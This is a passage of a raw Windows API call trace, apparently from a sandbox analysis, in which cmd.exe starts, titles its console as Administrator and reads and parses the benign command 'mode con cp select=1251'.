lpNumberOfBytesWritten=0x28f698*=0x24, lpOverlapped=0x0) returned 1 [0032.694] _vsnwprintf (in: _Buffer=0x4a8b6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f738 | out: _Buffer="\r\n") returned 2 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] GetFileType (hFile=0xf4) returned 0x3 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.694] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f708, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f708*=0x2, lpOverlapped=0x0) returned 1 [0032.694] _vsnwprintf (in: _Buffer=0x4a8b6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x28f738 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] GetFileType (hFile=0xf4) returned 0x3 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0032.695] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x28f708, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f708*=0x3f, lpOverlapped=0x0) returned 1 [0032.695] _vsnwprintf (in: _Buffer=0x4a8b6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f738 | out: _Buffer="\r\n") returned 2 [0032.695] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.695] GetFileType (hFile=0xf4) returned 0x3 [0032.695] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.695] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.695] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f708, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f708*=0x2, lpOverlapped=0x0) returned 1 [0032.695] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.695] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0 [0032.695] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290 [0032.695] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0 [0032.695] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.695] GetFileType (hFile=0xe8) returned 0x3 [0032.695] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0032.695] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x28f560 | out: TokenHandle=0x28f560*=0x0) returned 0xc000007c [0032.695] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x28f560 | out: TokenHandle=0x28f560*=0x50) returned 0x0 [0032.695] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x28f570, TokenInformationLength=0x4, ReturnLength=0x28f578 | out: TokenInformation=0x28f570, ReturnLength=0x28f578) returned 0x0 [0032.695] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x28f578, TokenInformationLength=0x4, ReturnLength=0x28f570 | out: TokenInformation=0x28f578, ReturnLength=0x28f570) returned 0x0 [0032.695] NtClose (Handle=0x50) returned 0x0 [0032.695] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x28f540, nSize=0x0, Arguments=0x28f548 | out: lpBuffer="\x97e0\x2f") returned 0xf [0032.696] GetProcessHeap () returned 0x2e0000 [0032.696] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2e1ab0 [0032.696] GetConsoleTitleW (in: lpConsoleTitle=0x28f590, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.696] wcsstr (_Str="C:\\Windows\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0032.696] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0032.697] GetProcessHeap () returned 0x2e0000 [0032.697] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1ab0 | out: hHeap=0x2e0000) returned 1 [0032.697] LocalFree (hMem=0x2f97e0) returned 0x0 [0032.697] GetProcessHeap () returned 0x2e0000 [0032.697] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0032.697] _vsnwprintf (in: _Buffer=0x4a8b6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f278 | out: _Buffer="\r\n") returned 2 [0032.697] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.697] GetFileType (hFile=0xf4) returned 0x3 [0032.697] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.697] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0032.697] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f248, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f248*=0x2, lpOverlapped=0x0) returned 1 [0032.697] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0032.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ac0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.697] _vsnwprintf (in: _Buffer=0x4a89eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f288 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0032.698] _vsnwprintf (in: _Buffer=0x4a89ebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x28f288 | out: _Buffer=">") returned 1 [0032.698] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.698] GetFileType (hFile=0xf4) returned 0x3 [0032.698] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.698] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop>", lpUsedDefaultChar=0x0) returned 39 [0032.698] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x28f278, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f278*=0x26, lpOverlapped=0x0) returned 1 [0032.698] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.698] GetFileType (hFile=0xe8) returned 0x3 [0032.698] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.698] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.698] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.698] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae320, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae322, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae324, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae326, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae328, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.699] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32a, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.699] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.699] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.699] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae32e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae330, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae332, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae334, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae336, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae338, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0032.700] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.700] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.700] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.700] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33a, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae33e, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae340, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae342, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae344, cchWideChar=1 | out: lpWideCharStr="=") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae346, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.701] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.701] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.701] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae348, cchWideChar=1 | out: lpWideCharStr="2") returned 1 [0032.702] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.702] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.702] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0032.702] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.702] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.702] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.702] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.702] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.702] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ac320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x28f578, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesRead=0x28f578*=0x1, lpOverlapped=0x0) returned 1 [0032.702] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ac320, cbMultiByte=1, lpWideCharStr=0x4a8ae34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0032.702] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.702] GetFileType (hFile=0xe8) returned 0x3 [0032.702] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.702] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.703] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.703] GetFileType (hFile=0xf4) returned 0x3 [0032.703] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.703] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0032.703] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x28f558, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, lpNumberOfBytesWritten=0x28f558*=0x18, lpOverlapped=0x0) returned 1 [0032.703] GetProcessHeap () returned 0x2e0000 [0032.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2fcd20 [0032.703] GetProcessHeap () returned 0x2e0000 [0032.703] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fcd20 | out: hHeap=0x2e0000) returned 1 [0032.703] _wcsicmp (_String1="mode", _String2=")") returned 68 [0032.703] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0032.703] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0032.703] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0032.703] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0032.703] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0032.703] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0032.703] GetProcessHeap () returned 0x2e0000 [0032.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97e0 [0032.703] GetProcessHeap () returned 0x2e0000 [0032.703] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1a) returned 0x2f4610 [0032.704] GetProcessHeap () returned 0x2e0000 [0032.704] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x38) returned 0x2f6510 [0032.704] 